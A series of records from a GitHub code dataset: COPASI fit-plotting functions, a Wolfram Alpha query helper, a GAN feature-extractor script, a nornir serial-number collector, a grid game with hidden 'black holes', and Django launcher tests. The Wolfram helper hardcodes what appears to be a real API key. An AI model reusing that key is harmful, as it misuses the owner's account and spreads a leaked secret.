get_simulation_results(**kwargs)\n\n for i in range(num_experiments):\n fig, ax = plt.subplots()\n cycler = plt.cycler(\"color\", plt.cm.tab20c.colors)()\n experiment = experiments.getExperiment(i)\n exp_name = experiment.getObjectName()\n mapping = get_experiment_mapping(experiment)\n ax.set_title(exp_name)\n\n # set independent values for that experiment\n dependent = mapping[mapping.type == 'dependent']\n\n num_dependent = dependent.shape[0]\n for j in range(num_dependent):\n nextval = next(cycler)['color']\n name = dependent.iloc[j].mapping\n if name not in sim_data[i].columns:\n name = name[1:-1]\n sim_data[i].reset_index().plot(x='Time', y=name,\n label=\"{0} Fit\".format(name), ax=ax, color=nextval)\n name = dependent.iloc[j].mapping\n exp_data[i].plot.scatter(x='Time', y=name, ax=ax, color=nextval,\n label='{0} Measured'.format(name))\n result.append((fig, ax))\n\n return result\n\n\ndef plot_per_dependent_variable(**kwargs):\n \"\"\"\n This function creates a figure for each dependent variable, with traces for all experiments.\n\n :param kwargs:\n\n - | `model`: to specify the data model to be used (if not specified\n | the one from :func:`.get_current_model` will be taken)\n\n :return: array of tuples (fig, ax) for each figure created\n \"\"\"\n dm = kwargs.get('model', model_io.get_current_model())\n\n task = dm.getTask(TASK_PARAMETER_ESTIMATION)\n assert (isinstance(task, COPASI.CFitTask))\n\n problem = task.getProblem()\n assert (isinstance(problem, COPASI.CFitProblem))\n\n experiments = problem.getExperimentSet()\n assert (isinstance(experiments, COPASI.CExperimentSet))\n\n result = []\n num_experiments = experiments.getExperimentCount()\n if num_experiments == 0:\n return result\n\n exp_data, sim_data = get_simulation_results(**kwargs)\n\n dependent_variables = {}\n\n for i in range(num_experiments):\n experiment = experiments.getExperiment(i)\n mapping = get_experiment_mapping(experiment)\n\n # set independent values for that experiment\n dependent = mapping[mapping.type == 'dependent']\n num_dependent = dependent.shape[0]\n for j in range(num_dependent):\n name = dependent.iloc[j].mapping\n if name not in dependent_variables:\n dependent_variables[name] = []\n dependent_variables[name].append(i)\n\n for dependent in dependent_variables:\n fig, ax = plt.subplots()\n cycler = plt.cycler(\"color\", plt.cm.tab20c.colors)()\n ax.set_title(dependent)\n experiment_indices = dependent_variables[dependent]\n\n for i in experiment_indices:\n experiment = experiments.getExperiment(i)\n exp_name = experiment.getObjectName()\n nextval = next(cycler)['color']\n name = dependent\n if name not in sim_data[i].columns:\n name = name[1:-1]\n\n sim_data[i].reset_index().plot(x='Time', y=name,\n label=\"{0} Fit\".format(exp_name), ax=ax, color=nextval)\n exp_data[i].plot.scatter(x='Time', y=dependent, ax=ax, color=nextval,\n label='{0} Measured'.format(exp_name))\n result.append((fig, ax))\n\n return result\n", "repo_name": "sh15h4nk/basico", "sub_path": "basico/task_parameterestimation.py", "file_name": "task_parameterestimation.py", "file_ext": "py", "file_size_in_byte": 33202, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "model_io.get_current_model", "line_number": 55, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 56, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 59, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 62, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 78, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 79, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 82, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 85, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 95, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 96, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 99, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 102, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 122, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 123, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 126, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 129, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 136, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 137, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 138, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 139, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 141, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 157, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 158, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 159, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 162, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 165, "usage_type": "attribute"}, {"api_name": "builtins.ValueError", "line_number": 169, "usage_type": "call"}, {"api_name": "builtins.ValueError", "line_number": 174, "usage_type": "call"}, {"api_name": "COPASI.CCommonName", "line_number": 205, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 216, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path", "line_number": 224, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 224, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 227, "usage_type": "call"}, {"api_name": "os.path", "line_number": 227, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "builtins.ValueError", "line_number": 234, "usage_type": "call"}, {"api_name": "COPASI.CExperiment", "line_number": 277, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 281, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 286, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 294, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 299, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 328, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 332, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 335, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 338, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 376, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 425, "usage_type": "call"}, {"api_name": "COPASI.CFitProblem", "line_number": 429, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 435, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 449, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 470, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 473, "usage_type": "call"}, {"api_name": "COPASI.CFitProblem", "line_number": 477, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 487, "usage_type": "call"}, {"api_name": "COPASI.CExperiment", "line_number": 495, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 499, "usage_type": "call"}, {"api_name": "COPASI.CFitItem", "line_number": 503, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 505, "usage_type": "call"}, {"api_name": "COPASI.CCommonName", "line_number": 507, "usage_type": "call"}, {"api_name": "COPASI.CRootContainer.getKeyFactory", "line_number": 513, "usage_type": "call"}, {"api_name": "COPASI.CRootContainer", "line_number": 513, "usage_type": "attribute"}, {"api_name": "COPASI.CCopasiParameterGroup", "line_number": 524, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 548, "usage_type": "call"}, {"api_name": "COPASI.CFitProblem", "line_number": 551, "usage_type": "attribute"}, {"api_name": "COPASI.CCommonName", "line_number": 560, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 573, "usage_type": "call"}, {"api_name": "COPASI.CExperiment", "line_number": 578, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 579, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 580, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 581, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 582, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 583, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 584, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 585, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 586, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 587, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 589, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 618, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 619, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 621, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 623, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 625, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 628, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 633, "usage_type": "call"}, {"api_name": "os.path", "line_number": 633, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 633, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 637, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 641, "usage_type": "call"}, {"api_name": "COPASI.CExperimentFileInfo", "line_number": 643, "usage_type": "call"}, {"api_name": "COPASI.CTaskEnum", "line_number": 654, "usage_type": "attribute"}, {"api_name": "COPASI.CTaskEnum", "line_number": 656, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 662, "usage_type": "attribute"}, {"api_name": "COPASI.CExperiment", "line_number": 665, "usage_type": "attribute"}, {"api_name": "logging.warning", "line_number": 669, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 735, "usage_type": "call"}, {"api_name": "COPASI.CDataModel", "line_number": 736, "usage_type": "attribute"}, {"api_name": "COPASI.CFitTask", "line_number": 739, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 748, "usage_type": "attribute"}, {"api_name": "COPASI.CCopasiMethod_TypeNameToEnum", "line_number": 761, "usage_type": "call"}, {"api_name": "COPASI.CCopasiTask", "line_number": 774, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 776, "usage_type": "call"}, {"api_name": "COPASI.CCopasiMessage.getLastMessage", "line_number": 777, "usage_type": "call"}, {"api_name": "COPASI.CCopasiMessage", "line_number": 777, "usage_type": "attribute"}, {"api_name": "logging.error", "line_number": 781, "usage_type": "call"}, {"api_name": "COPASI.CCopasiMessage.getLastMessage", "line_number": 782, "usage_type": "call"}, {"api_name": "COPASI.CCopasiMessage", "line_number": 782, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 801, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 804, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 807, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 810, "usage_type": "attribute"}, {"api_name": "COPASI.DataObjectSet", "line_number": 825, "usage_type": "call"}, {"api_name": "COPASI.CCommonName", "line_number": 838, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 852, "usage_type": "call"}, {"api_name": "basico.set_reaction_parameters", "line_number": 858, "usage_type": "call"}, {"api_name": "basico.run_time_course", "line_number": 861, "usage_type": "call"}, {"api_name": "model_io.get_current_model", "line_number": 881, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 884, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 887, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 890, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 900, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 900, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cycler", "line_number": 901, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 901, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 901, "usage_type": "attribute"}, {"api_name": "model_io.get_current_model", "line_number": 937, "usage_type": "call"}, {"api_name": "COPASI.CFitTask", "line_number": 940, "usage_type": "attribute"}, {"api_name": "COPASI.CFitProblem", "line_number": 943, "usage_type": "attribute"}, {"api_name": "COPASI.CExperimentSet", "line_number": 946, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 971, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 971, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cycler", "line_number": 972, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 972, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 972, "usage_type": "attribute"}]} +{"seq_id": "41526284482", "text": "import wolframalpha\n\n\n\ndef Wolfram_ask(query):\n try:\n client = wolframalpha.Client(\"46WHPG-HXUK7P8KA5\")\n res = client.query(query)\n print (query)\n msg = next(res.results).text\n\n except:\n msg = \"Please re-phrase your request.\"\n return msg\n", "repo_name": "megasonu1000/FbAnimus_Python-3.6.5", "sub_path": "Skills/WolframSkill.py", "file_name": "WolframSkill.py", "file_ext": "py", "file_size_in_byte": 251, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "wolframalpha.Client", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "25600483905", "text": "import torch\nimport argparse\nfrom models.loss_criterions.loss_texture import LossTexture\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Testing script')\n parser.add_argument('model_name', type=str,\n choices=[\"vgg19\", \"vgg16\"],\n help=\"\"\"Name of the desured featire extractor:\n - vgg19, vgg16 : a variation of the style transfer \\\n feature developped in \\\n http://arxiv.org/abs/1703.06868\"\"\")\n parser.add_argument('--layers', type=int, nargs='*',\n help=\"For vgg models only. Layers to select. \\\n Default ones are 3, 4, 5.\", default=None)\n parser.add_argument('output_path', type=str,\n help=\"\"\"Path of the output feature extractor\"\"\")\n\n args = parser.parse_args()\n\n if args.model_name in [\"vgg19\", \"vgg16\"]:\n if args.layers is None:\n args.layers = [3, 4, 5]\n featureExtractor = LossTexture(torch.device(\"cpu\"),\n args.model_name,\n args.layers)\n featureExtractor.saveModel(args.output_path)\n else:\n raise AttributeError(args.model_name + \" not implemented yet\")\n", "repo_name": "facebookresearch/pytorch_GAN_zoo", "sub_path": "save_feature_extractor.py", "file_name": "save_feature_extractor.py", "file_ext": "py", "file_size_in_byte": 1306, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1573, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 7, "usage_type": "call"}, {"api_name": "models.loss_criterions.loss_texture.LossTexture", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "38654531979", "text": "from nornir import InitNornir\nfrom nornir_utils.plugins.functions import print_result\nfrom nornir_netmiko import netmiko_send_command\nimport pandas\n\n# 加载config,创建一个nornir对象\n#- display device manuinfo | in NUMBER\nnr = InitNornir(config_file=\"config.yaml\")\n\noutputs = []\nsn_tables = []\n\n\ndef show_cmds(task):\n # Task类通过host属性,读取yaml配置,获取其中设备信息\n cmds = task.host.data['cmds']\n\n for cmd in cmds:\n # print(cmd)\n # Task类调用run方法,执行任务,如netmiko_send_command、write_file等插件\n result = task.run(netmiko_send_command, command_string=cmd)\n output = result.result\n #sn_number = (f'{output}'.replace(' ', '@')).split('@')[-1]\n sn_number = list(filter(None,output.split(' ')))[-2]\n hostname = f'{task.host.hostname}'\n print(hostname + ' ' + 'SN ' + sn_number)\n outputs.append(output)\n sn_table = [hostname, sn_number]\n sn_tables.append(sn_table)\n\n return outputs\n\n\nresults = nr.run(task=show_cmds)\nprint(results)\nprint_result(results)\ncolumns = ['hostname', 'Loop']\ntables = pandas.DataFrame(sn_tables, columns=columns)\nnamestr = 'host_Loop.xlsx'\ntables.to_excel(namestr, index=0)\nprint('{name} created!'.format(name=namestr))\n", "repo_name": "wangcongxing/NetOpsNornir", "sub_path": "inventory/host_sn.py", "file_name": "host_sn.py", "file_ext": "py", "file_size_in_byte": 1286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "nornir.InitNornir", "line_number": 8, "usage_type": "call"}, {"api_name": "nornir_netmiko.netmiko_send_command", "line_number": 21, "usage_type": "argument"}, {"api_name": "nornir_utils.plugins.functions.print_result", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "8236350926", "text": "import ipywidgets as widgets\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nfrom application.settings import Settings\nfrom ui.widgets import Widgets\n\n\nclass Game:\n CELL_OPEN_FLAG = 0\n BUTTON_INIT = None\n grid_buttons = None\n base_mask = None\n n_open_cells = 0\n\n def __init__(self, app_widgets: Widgets, settings: Settings):\n # initializing the basic properties\n\n self.matrix_size = app_widgets.matrix_size.value\n self.n_black_holes = app_widgets.n_black_holes.value\n self.settings = settings\n self.height = self.matrix_size\n self.width = self.matrix_size\n\n # defining a table, black holes, adjacent black holes cells, and buttons\n self.rows = self.find_exact_adjacent()\n self.generate_black_holes()\n self.calculate_adjacent_black_holes()\n self.get_base_mask()\n self.rows[\"cell_open\"] = self.CELL_OPEN_FLAG\n self.rows[\"button\"] = self.BUTTON_INIT\n self.rows.loc[self.base_mask, \"button\"] = self.rows.loc[self.base_mask].apply(\n lambda row: self.create_expanded_button(row), axis=1)\n\n # defining a grid of buttons\n self.grid_buttons = self.get_buttons()\n\n def get_base_mask(self):\n self.base_mask = (self.rows.primary_key == self.rows.adjacent)\n\n @staticmethod\n def find_all_potential_adjacent(elements_list):\n \"\"\"\n The function generates all potential adjacent cells\n :return:\n element - an array of all potential adjacent cells\n \"\"\"\n\n # getting the current row and column index, and the matrix width\n row, col, width = elements_list\n\n # generating all potential adjacent cells\n element = np.array([\n (row * width + 1 + col) - width - 1,\n (row * width + 1 + col) - width,\n (row * width + 1 + col) - width + 1,\n (row * width + 1 + col) - 1,\n (row * width + 1 + col),\n (row * width + 1 + col) + 1,\n (row * width + 1 + col) + width - 1,\n (row * width + 1 + col) + width,\n (row * width + 1 + col) + width + 1,\n ])\n\n return element\n\n def find_exact_adjacent(self):\n \"\"\"\n The function generates a table with cells information and theirs adjacent cells details\n :return:\n rows - pd.DataFrame, a table with columns:\n primary_key - an ordered id from 0 to self.matrix_size - 1\n adjacent - a vector of corresponding adjacent cells for the corresponding primary key\n \"\"\"\n\n # generating a table with primary keys, potential adjacent cells, and the matrix size as a constant\n rows = pd.DataFrame({\"primary_key\": np.repeat(np.arange(self.matrix_size), self.matrix_size),\n \"secondary_key\": np.tile(np.arange(self.matrix_size), self.matrix_size),\n \"size\": np.repeat(self.matrix_size, self.matrix_size ** 2)\n }, index=np.arange(self.matrix_size ** 2) + 1)\n\n # concatenating columns\n rows = pd.DataFrame(rows.apply(lambda x: (x[0], x[1], x[2]), axis=1).rename(\"adjacent\"))\n\n # finding all potential adjacent cells\n rows = rows.applymap(lambda x: self.find_all_potential_adjacent(x))\n\n # keeping only right adjacent cells\n end_inds = np.linspace(self.height, self.width * self.height, self.height, dtype=int)\n start_inds = np.linspace(1, self.width * self.height - (self.height - 1), self.width, dtype=int)\n rows.adjacent.loc[end_inds] = rows.loc[end_inds].adjacent.apply(lambda x: np.delete(x, [2, 5, 8]))\n rows.adjacent.loc[start_inds] = rows.loc[start_inds].adjacent.apply(lambda x: np.delete(x, [0, 3, 6]))\n\n # converting the column of arrays to the column of lists\n rows.adjacent = rows.adjacent.apply(lambda x: list(x))\n\n # resetting the index and exploding the variable\n rows = rows.reset_index().rename(columns={\"index\": \"primary_key\"})\n rows = rows.explode('adjacent')\n\n # keeping only visible values\n rows = rows[(rows.adjacent >= 1) & (rows.adjacent <= self.width * self.height)].reset_index(drop=True)\n\n return rows\n\n def generate_black_holes(self):\n \"\"\"\n The function generates black holes with the uniform distribution\n \"\"\"\n # generating random indexes of potential black holes\n black_holes_index = np.random.choice(self.rows[self.rows.primary_key == self.rows.adjacent].index.tolist(),\n size=self.n_black_holes,\n replace=False)\n\n # initializing a column and filling with black holes flag\n self.rows[\"black_holes\"] = 0\n self.rows.loc[black_holes_index, \"black_holes\"] = 1\n\n # sharing the information about black holes flags among their adjacent cells\n black_keys = self.rows.groupby([\"primary_key\"]).apply(\n lambda x: x.black_holes.sum()).rename(\"black_key\").reset_index()\n self.rows = pd.merge(self.rows, black_keys, on=[\"primary_key\"], how=\"inner\")\n\n def calculate_adjacent_black_holes(self):\n \"\"\"\n The function calculates a number of adjacent cells\n \"\"\"\n\n # calculating the sum of adjacent black holes\n adjacent_black_hole = self.rows.groupby([\"adjacent\"]).apply(lambda x: x.black_key.sum()).rename(\n \"adjacent_black_hole\").reset_index()\n self.rows = pd.merge(self.rows, adjacent_black_hole, on=[\"adjacent\"], how=\"inner\")\n self.rows = self.rows.sort_values(by=[\"primary_key\", \"adjacent\"]).reset_index(drop=True)\n\n def create_expanded_button(self, row):\n \"\"\"\n The function create a button for a cell\n :param row:\n :return:\n button - widgets.Button with special properties\n \"\"\"\n\n # extracting a number of a cell, a black hole flag, and a number of adjacent black holes\n number = row.primary_key\n black_hole = row.black_holes\n adjacent_bh = row.adjacent_black_hole\n\n # creating a button with its properties\n button = widgets.Button(\n tooltip=f\"{number}\",\n style={\"button_color\": self.settings.handle_color.get(\"WON\")},\n layout={\"height\": self.settings.cell.get(\"HEIGHT_CELL\"),\n \"width\": self.settings.cell.get(\"WIDTH_CELL\"),\n \"border\": self.settings.borders.get(\"CELL\"),\n })\n button.black_hole = bool(black_hole)\n button.adjacent_bh = adjacent_bh\n\n return button\n\n def plot_heatmap(self):\n \"\"\"\n This function plots a figure with # of adjacent black hole cells and black holes itself\n \"\"\"\n # defining # of adjacent black hole cells and black holes itself\n adjacent_black_holes_matrix = self.get_adjacent_holes_matrix()\n\n # plotting a figure\n plt.figure(figsize=(15, 8))\n sns.heatmap(adjacent_black_holes_matrix)\n plt.title(\"# of adjacent black hole cells and black holes\")\n plt.show()\n\n def get_adjacent_holes_matrix(self):\n \"\"\"\n This function convert the table to a matrix of # of adjacent black hole cells, and marks the black hole\n cell as -1\n :return:\n \"\"\"\n # defining a matrix whether a cell is black hole or not, and inverting 1 -> 0, and 0 -> 1\n black_holes_matrix = self.rows[self.rows.primary_key == self.rows.adjacent\n ].black_holes.values.reshape(self.height, self.width)\n black_holes_matrix_invert = np.logical_xor(black_holes_matrix, 1).astype(int)\n\n # defining a matrix of # adjacent black holes cells\n adjacent_black_holes_matrix = self.rows[self.rows.primary_key == self.rows.adjacent\n ].adjacent_black_hole.values.reshape(self.height, self.width)\n adjacent_black_holes_matrix = adjacent_black_holes_matrix * black_holes_matrix_invert + (\n -1 * black_holes_matrix)\n\n return adjacent_black_holes_matrix\n\n def get_buttons(self):\n \"\"\"\n This function extracts all buttons to a list\n :return:\n grid_buttons: a list of buttons\n \"\"\"\n grid_buttons = self.rows[self.rows.primary_key == self.rows.adjacent].button.values.reshape(-1).tolist()\n\n return grid_buttons\n\n def get_all_cells_to_open(self, number):\n \"\"\"\n This function finds all adjacent cells to open while clicking a specific cell\n :param number: a cell clicked\n :return:\n \"\"\"\n # defining a set of all buttons to be open and buttons with zero adjacent black hole cells\n all_cells_to_open = set()\n adjacent_open_cells = {number}\n\n # while there is any cells with zero adjacent black hole -> find adjacent cells\n while len(adjacent_open_cells) != 0:\n # only cells with zero adjacent black hole cells\n open_adj_cells_mask = (self.rows.primary_key.isin(adjacent_open_cells)) & (\n ~self.rows.adjacent.isin(adjacent_open_cells)) & (self.rows.adjacent_black_hole == 0)\n open_tmp_all_adj_cells_mask = (self.rows.primary_key.isin(adjacent_open_cells))\n\n # extracting new cells with zero adjacent black hole cells\n adjacent_open_cells = set(self.rows.loc[open_adj_cells_mask].adjacent.values.tolist())\n adjacent_open_cells = adjacent_open_cells.difference(all_cells_to_open)\n\n # all adjacent cells to cells with zero adjacent black hole cells\n all_adjacent_open_cells = self.rows.loc[open_tmp_all_adj_cells_mask].adjacent.values.tolist()\n all_cells_to_open.update(all_adjacent_open_cells)\n\n return all_cells_to_open\n\n def calculate_open_cells(self):\n \"\"\"\n This function calculates # of open cells\n :return:\n \"\"\"\n self.n_open_cells = self.rows.loc[self.base_mask, \"cell_open\"].sum()\n", "repo_name": "AntonLiutov/game_sapper_prototype", "sub_path": "application/simulate_data.py", "file_name": "simulate_data.py", "file_ext": "py", "file_size_in_byte": 10143, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ui.widgets.Widgets", "line_number": 17, "usage_type": "name"}, {"api_name": "application.settings.Settings", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 54, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.tile", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 79, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 81, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 84, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.merge", "line_number": 123, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 133, "usage_type": "call"}, {"api_name": "ipywidgets.Button", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "seaborn.heatmap", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "numpy.logical_xor", "line_number": 184, "usage_type": "call"}]} +{"seq_id": "20558654569", "text": "\nfrom django.urls import reverse\n\nfrom oppia.models import CourseStatus\nfrom oppia.test import OppiaTestCase\nfrom django.http import Http404\n\nfrom tests.utils import update_course_status\n\n\nclass AppLaunchActivityTest(OppiaTestCase):\n fixtures = ['tests/test_user.json',\n 'tests/test_oppia.json',\n 'tests/test_quiz.json',\n 'tests/test_permissions.json',\n 'tests/test_course_permissions.json']\n\n STR_LAUNCHER_TEMPLATE = 'course/app_launcher.html'\n STR_URL_REDIRECT = 'oppia:app_launch_activity_redirect'\n valid_digest = '11cc12291f730160c324b727dd2268b612137'\n invalid_digest = '1ab2c3d4e5f6'\n valid_course = 'anc1-all'\n invalid_course = 'mycourse'\n\n # all users should be able to access without logging in\n def test_access_valid_digest(self):\n url = ('%s?digest=' + self.valid_digest) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_no_digest(self):\n url = reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertRaises(ValueError)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_invalid_digest(self):\n url = ('%s?digest=' + self.invalid_digest) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_valid_course(self):\n url = ('%s?course=' + self.valid_course) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_access_invalid_course(self):\n url = ('%s?course=' + self.invalid_course) \\\n % reverse(self.STR_URL_REDIRECT)\n response = self.client.get(url)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n\n def test_no_access_for_draft_course(self):\n url = ('%s?course=' + self.valid_course) \\\n % reverse(self.STR_URL_REDIRECT)\n update_course_status(1, CourseStatus.DRAFT)\n response = self.client.get(url)\n self.assertRaises(Http404)\n self.assertTemplateUsed(response, self.STR_LAUNCHER_TEMPLATE)\n self.assertEqual(200, response.status_code)\n update_course_status(1, 